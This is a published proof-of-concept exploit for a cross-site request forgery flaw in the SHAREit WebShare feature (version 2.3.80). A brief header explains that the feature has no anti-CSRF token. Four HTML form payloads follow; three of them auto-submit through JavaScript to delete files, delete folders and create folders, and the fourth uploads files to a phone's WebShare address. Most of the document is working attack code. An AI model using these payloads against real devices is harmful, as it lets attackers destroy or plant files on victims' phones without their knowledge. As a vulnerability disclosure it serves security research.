<!--
Exploit Title: SHAREit WebShare Cross Site Request Forgery
Vendor Home Page: http://shareit.lenovo.com
Software Link: http://shareit.lenovo.com/download.html
Version: 2.3.80
Tested On: IOS 9.1, Windows 7
Date: 19 Nov. 2015
Researcher: Mahdi.Hidden
POC:
There is a CSRF vulnerability in SHAREit last version in WebShare section.
For test it open the application on your phone and go to "WebShare".
Afterwards, the application will give you the URL of WebShare. (For example: http://192.168.1.2)
You will see the page which lets you transferring file between PC and Phone.
You can Make Folder, Upload File, Delete File, Delete Folder and ... but there is no security token for prevent CSRF.
This vulnerability allows you to Delete File, Delete Folder and ... .
There is some exploit for doing this.
-->
<!-- Delete File -->
<form action="[Host]/delete" method="post" name="csrf"> (Ex. http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]/[File]"> (Ex. /folder/image.jpg)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>
<!-- Delete Folder -->
<form action="[Host]/delete" method="post" name="csrf"> (Ex. http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]/"> (Ex. /folder/)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>
<!-- Add Folder -->
<form action="[Host]/create" method="post" name="csrf"> (Ex. http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]"> (Ex. /folder/image.jpg)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>
<!-- Upload File -->
<form action="http://192.168.1.4/upload" method="post" enctype="multipart/form-data"> (Ex. http://192.168.1.2)
<input type="file" name="files[]" multiple>
<input type="hidden" name="path" value="[Path]">
<input type="submit">
</form>
<!--
# Mahdi.Hidden
# Ashiyane Digital Security Team
-->